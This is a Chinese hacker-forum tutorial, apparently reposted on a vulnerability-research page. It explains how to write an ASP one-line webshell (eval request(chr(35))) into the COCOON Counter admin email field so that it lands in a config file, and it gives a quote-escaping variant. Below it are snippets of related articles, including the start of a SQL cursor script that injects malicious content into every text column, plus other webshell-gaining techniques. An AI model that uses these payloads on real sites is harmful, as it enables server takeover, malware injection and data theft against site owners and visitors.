来源:邪恶八进制 作者:9xiao
引用最新海洋顶端eval版中的几句话,这里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧?不知的就去查查html吧。这样添好了,就可以用自己的做的c端了。如果不会,你就用我的那个现成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己变形吧,不多说了"
偶在本地架设了一个环境,实际操作中不能写错否则后悔就来不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//复制过去,,点击保存,看下_inc/common.asp的内容
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。
另注:黑防8期也提到了类似方法这里就贴出来,黑防中的代码可以写成9xiao"%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句!此统计程序还有暴库的地方这个就不公布了!
关于php的可以参考saiy写的phpwind后台得shell的三种方法。
COCOON Counter统计程序后台写马_漏洞研究
时间: 2025-01-25 14:48:41
COCOON Counter统计程序后台写马_漏洞研究的相关文章
最近比较流行的数据库挂马_漏洞研究
SQL语句如下: 用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马.(全部是允许写入字符的字段) xtype=99 ntext xtype=35 text xtype=231 nvarchar xtype=167 varchar -------YD的分割----------– DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobje
从后台到webshell的一点思路_漏洞研究
主要是利用后台对access数据库的"备份数据库"或"恢复数据库"功能,"备份的数据库路径"等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用.具体方法和分析可以参考angel的文章<动网论坛7.0获得WebShell的分析>.据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异. php+mysql程序
当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究
今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图! 列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell"> 里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们
网站程序中非SI漏洞的利用_漏洞研究
Part I 前言 现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者. 非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的. Part II 方法介绍 常规的非SI类攻击有如下几种: 一. 跨站脚本攻击(XSS) 跨站脚本攻击不会直接对网站服务
木马静态变动态 DLL木马程序大揭秘_漏洞研究
相信经常玩木马的朋友们都会知道一些木马的特性,也会有自己最喜爱的木马,不过,很多朋友依然不知道近年兴起的"DLL木马"为何物.什么是"DLL木马"呢?它与一般的木马有什么不同? 一.从DLL技术说起 要了解DLL木马,就必须知道这个"DLL"是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里.在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,有时候为了实现一个功能,就要为此写很多代码,后来随着编程技术发展,程序员们把
再探九酷网络个人主页空间管理系统_漏洞研究
本文作者:玄猫[B.C.T] 本文原发表于<黑客X档案>2005年第7期,网上首发地址为B.C.T(http://www.cnbct.org/showarticle.asp?id=495)和黑色森林(http://www.blackwoosd.cn) 本文版权归<黑客X档案>和作者杂志社所有 -------------------------------------------------------------------------------- 玄猫在2004年12
Discuz!论坛install.php书写错误漏洞_漏洞研究
书写错误,导致恶意用户构造语句可以写入webshell,进而控制整个服务器. 前几个晚上,把前台文件,只要是数据库调用中的变量都看了一遍.看看是不是有过滤不严的地方,看完后觉得,过滤不严的地方的确不少,但是都已经被单引号保护起来了.在php中,如果magic_qoute_gpc=on(默认的)编译器会自动把单引号等特殊字符转义,而这个时候我们想改变程序的执行流程是非常困难的.这样大大的增加了入侵的难度,在某种程度上,也的确保证了其安全.这也是为什么朋友提出一定要在magic_qoute_g
缓冲区溢出:十年来攻击和防卫的弱点_漏洞研究
摘要: 在过去的十年中,以缓冲区溢出为类型的安全漏洞占是最为 常见的一种形式了.更为严重的是,缓冲区溢出漏洞占了远程网 络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户 有机会获得一台主机的部分或全部的控制权!如果能有效地消除 缓冲区溢出的漏洞,则很大一部分的安全威胁可以得到缓解.在 本文中,我们研究了各种类型的缓冲区溢出漏洞和攻击手段,同 时我们也研究了各种的防御手段,这些手段用来消除这些漏洞所 造成的影响,其中包括我们自己的堆栈保护方法.然后我们要考 虑如何在保证现有系统功能
伯乐asp收信程序漏洞及利用程序利用代码_漏洞研究
http://forum.eviloctal.com/thread-32151-1-1.html 之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧.. 伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞) 主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保.. mibao.asp文件对提交的参数没有任何过滤 复制代码 代码如下: if action="put" then